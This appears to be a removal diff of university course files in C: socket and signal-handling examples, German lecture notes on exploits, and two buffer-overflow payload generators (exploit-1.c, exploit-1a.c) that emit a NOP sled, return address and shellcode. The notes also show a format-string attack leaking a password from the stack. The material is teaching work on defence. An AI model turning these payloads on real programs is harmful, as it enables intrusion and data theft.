20170630/server.c

-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <netdb.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-#define PORT 1234
-#define MESSAGE "Hello, world!\n"
-
-void error (char *msg)
-{
-  fprintf (stderr, "%s\n", msg);
-  exit (1);
-}
-
-int main (void)
-{
-  int s;
-  struct sockaddr_in name;
-  if ((s = socket (PF_INET, SOCK_STREAM, 0)) < 0)
-    error ("cannot create socket");
-  memset (&name, 0, sizeof (name));
-  name.sin_family = AF_INET;
-  name.sin_port = htons (PORT);
-  name.sin_addr.s_addr = htonl (INADDR_ANY);
-  int on = 1;
-  setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (void *) &on, sizeof (on));
-  if (bind (s, (struct sockaddr *) &name, sizeof (name)) < 0)
-    {
-      close (s);
-      error ("cannot bind socket");
-    }
-  if (listen (s, 16) < 0)
-    {
-      close (s);
-      error ("cannot listen on socket");
-    }
-  struct sockaddr_in clientname;
-  size_t size = sizeof (clientname);
-  s = accept (s, (struct sockaddr *) &clientname, &size);
-  if (s < 0)
-    error ("cannot accept connection");
-  char *host_address = inet_ntoa (clientname.sin_addr);
-  char *host_name;
-  struct hostent *hp = gethostbyaddr ((void *) &clientname.sin_addr, sizeof (clientname.sin_addr), clientname.sin_family);
-  if (hp)
-    host_name = hp->h_name;
-  else
-    host_name = inet_ntoa (clientname.sin_addr);
-  int remote_port = ntohs (clientname.sin_port);
-  printf ("connection from %s [%s], port %d\n",
-          host_name, host_address, remote_port);
-  send (s, MESSAGE, strlen (MESSAGE), 0);
-  shutdown (s, SHUT_RDWR);
-  close (s);
-  return 0;
-}

20170630/signals-0.c

-#include <signal.h>
-#include <stdio.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  signal (SIGINT, signal_handler);
-  while (1);
-  return 0;
-}

20170630/signals-1.c

-#include <signal.h>
-#include <stdio.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  if (signal (SIGINT, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-  while (1);
-  return 0;
-}

20170630/signals-2.c

-#include <signal.h>
-#include <stdio.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  if (signal (SIGUSR1, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-  while (1);
-  return 0;
-}

20170630/signals-3.c

-#include <signal.h>
-#include <stdio.h>
-#include <sys/time.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  if (signal (SIGVTALRM, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-
-  struct itimerval timer;
-  timer.it_value.tv_sec = 1;
-  timer.it_value.tv_usec = 0;
-  timer.it_interval.tv_sec = 1;
-  timer.it_interval.tv_usec = 0;
-  setitimer (ITIMER_VIRTUAL, &timer, NULL);
-
-  while (1);
-  return 0;
-}

20170630/signals-4.c

-#include <signal.h>
-#include <stdio.h>
-#include <sys/time.h>
-#include <unistd.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  if (signal (SIGVTALRM, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-
-  struct itimerval timer;
-  timer.it_value.tv_sec = 1;
-  timer.it_value.tv_usec = 0;
-  timer.it_interval.tv_sec = 1;
-  timer.it_interval.tv_usec = 0;
-  setitimer (ITIMER_VIRTUAL, &timer, NULL);
-
-  while (1)
-    sleep (10);
-  return 0;
-}

20170630/signals-5.c

-#include <signal.h>
-#include <stdio.h>
-#include <sys/time.h>
-#include <unistd.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-}
-
-int main (void)
-{
-  if (signal (SIGALRM, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-
-  struct itimerval timer;
-  timer.it_value.tv_sec = 1;
-  timer.it_value.tv_usec = 0;
-  timer.it_interval.tv_sec = 1;
-  timer.it_interval.tv_usec = 0;
-  setitimer (ITIMER_REAL, &timer, NULL);
-
-  while (1)
-    sleep (10);
-  return 0;
-}

20170630/signals-6.c

-#include <signal.h>
-#include <stdio.h>
-#include <unistd.h>
-
-static void signal_handler (int signo)
-{
-  printf ("Hello, world!\n");
-  alarm (1);
-}
-
-int main (void)
-{
-  if (signal (SIGALRM, signal_handler) == SIG_ERR)
-    {
-      fputs ("Error installing signal handler.\n", stderr);
-      return 1;
-    }
-  alarm (1);
-  while (1)
-    sleep (10);
-  return 0;
-}

20170707/client.c

-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <netdb.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-#define TARGET_HOST "localhost"
-#define PORT 1234
-#define MESSAGE "Hello, world!\n"
-
-void error (char *msg)
-{
-  fprintf (stderr, "%s\n", msg);
-  exit (1);
-}
-
-int main (void)
-{
-  int s;
-  struct sockaddr_in name;
-  if ((s = socket (PF_INET, SOCK_STREAM, 0)) < 0)
-    error ("cannot create socket");
-  memset (&name, 0, sizeof (name));
-  name.sin_family = AF_INET;
-  name.sin_port = htons (PORT);
-  name.sin_addr.s_addr = htonl (INADDR_ANY);
-  struct hostent *ho = gethostbyname (TARGET_HOST);
-  if (!ho)
-    {
-      close (s);
-      error ("name server lookup error");
-    }
-  if (ho->h_length > (int) sizeof (name.sin_addr))
-    ho->h_length = sizeof (name.sin_addr);
-  memcpy (&name.sin_addr, ho->h_addr, ho->h_length);
-  if (connect (s, (struct sockaddr *) &name, sizeof (name)) < 0)
-    {
-      close (s);
-      error ("cannot connect to socket");
-    }
-  send (s, MESSAGE, strlen (MESSAGE), 0);
-  shutdown (s, SHUT_RDWR);
-  close (s);
-  return 0;
-}

20170707/server.c

-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <netdb.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-#define PORT 1234
-#define MESSAGE "Hello, world!\n"
-
-void error (char *msg)
-{
-  fprintf (stderr, "%s\n", msg);
-  exit (1);
-}
-
-int main (void)
-{
-  int s;
-  struct sockaddr_in name;
-  if ((s = socket (PF_INET, SOCK_STREAM, 0)) < 0)
-    error ("cannot create socket");
-  memset (&name, 0, sizeof (name));
-  name.sin_family = AF_INET;
-  name.sin_port = htons (PORT);
-  name.sin_addr.s_addr = htonl (INADDR_ANY);
-  int on = 1;
-  setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (void *) &on, sizeof (on));
-  if (bind (s, (struct sockaddr *) &name, sizeof (name)) < 0)
-    {
-      close (s);
-      error ("cannot bind socket");
-    }
-  if (listen (s, 16) < 0)
-    {
-      close (s);
-      error ("cannot listen on socket");
-    }
-  struct sockaddr_in clientname;
-  size_t size = sizeof (clientname);
-  s = accept (s, (struct sockaddr *) &clientname, &size);
-  if (s < 0)
-    error ("cannot accept connection");
-  char *host_address = inet_ntoa (clientname.sin_addr);
-  char *host_name;
-  struct hostent *hp = gethostbyaddr ((void *) &clientname.sin_addr, sizeof (clientname.sin_addr), clientname.sin_family);
-  if (hp)
-    host_name = hp->h_name;
-  else
-    host_name = inet_ntoa (clientname.sin_addr);
-  int remote_port = ntohs (clientname.sin_port);
-  printf ("connection from %s [%s], port %d\n",
-          host_name, host_address, remote_port);
-  send (s, MESSAGE, strlen (MESSAGE), 0);
-  shutdown (s, SHUT_RDWR);
-  close (s);
-  return 0;
-}

20170714/bs-20170714.txt

-Exploits, 14.07.2017
-~~~~~~~~~~~~~~~~~~~~
-Vorab:
-
-  Dies ist keine Einladung, anderer Leute Systeme anzugreifen.
-  Derartige Handlungen sind Straftaten.
-
-  Ich erzähle Ihnen dies, damit Sie wissen,
-  wie Sie sich gegen derartige Angriffe verteidigen können.
-
-  Um es gleich vorwegzunehmen:
-  Gewöhnen Sie sich von vorneherein an,
-  sauber und ordentlich zu programmieren.
-
-Anleitungen für Exploits:
-http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/index.html
-http://www.thesprawl.org/research/exploit-exercises-protostar-stack/
-
-Literatur:
-Jon Erickson: Hacking: The Art of Exploitation.
-No Starch Press, 2003. ISBN: 1-59327-007-0
-
-Anleitung für den GNU-Debugger (gdb):
-http://beej.us/guide/bggdb/
-
-Formatstring-Angriff:
-
-  printf (user_string) für Exploit nutzen: %016llx
-  Server, der Passwort auf dem Stack speichert --> server-0.c
-
-  $ ./server-0
-  Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
-  Hello, 00000000004007c7 00007fdb2ced2df0 00000000004007c7 00007fdb2d0f3007
-         20786c6c36313025 6373316870216948 00007fdb2cbd0068 0000007265746570!
-                          ~~~~~~~~~~~~~~~~             ~~~~
-  Your password, please:
-
-SQL Injection: http://xkcd.com/327/
-
-Noch blöder: Java-Browser-Applet enthält Passwörter im Klartext:
-http://heise.de/-2812713
-
-Buffer Overflow für Exploit nutzen: server-[123].c, exploit-*
-
-Warum Absturz? Rücksprungadresse wird überschrieben. Blick auf den Stack.
-Funktionsaufruf: Register setzen, Funktion anspringen.
-Exploit: Rücksprungadresse gezielt überschreiben.
-Früher möglich: Programm in den Stack schreiben, dorthin springen.
-Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
-Return Oriented Programming erforderlich
-genauer: return-to-libc; noch genauer: return-to-plt
-Gezielt Winz-Funktionen anspringen, um Register zu setzen,
-danach Programm- und Bibliotheksfunktionen anspringen.
-
-Exploits: aktuelle Sicherheitslücke, 28.12.2016, 13:46:05
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Lücke in PHPMailer erlaubt die Ausführung fremden Codes
-https://heise.de/-3582072

20170714/exploit-1.c

-#include <unistd.h>
-
-int main (int argc, char **argv)
-{
-  for (int i = 2; i < 50; i++)
-    write (1, "\x90", 1);                // nop
-  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp
-  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi
-  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
-  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
-  write (1, "\xeb\xfe", 2);              // while (1);
-  write (1, "\n", 1);
-  return 0;
-}

20170714/exploit-1a.c

-#include <unistd.h>
-#include <stdint.h>
-
-int main (int argc, char **argv)
-{
-  uint64_t return_address = 0x7fffffffdfc0;
-  for (int i = 2; i < 42; i++)
-    write (1, "\x90", 1);                // nop
-  write (1, &return_address, 8);
-  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp
-  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi
-  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
-  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
-  write (1, "\xeb\xfe", 2);              // while (1);
-  write (1, "\n", 1);
-  return 0;
-}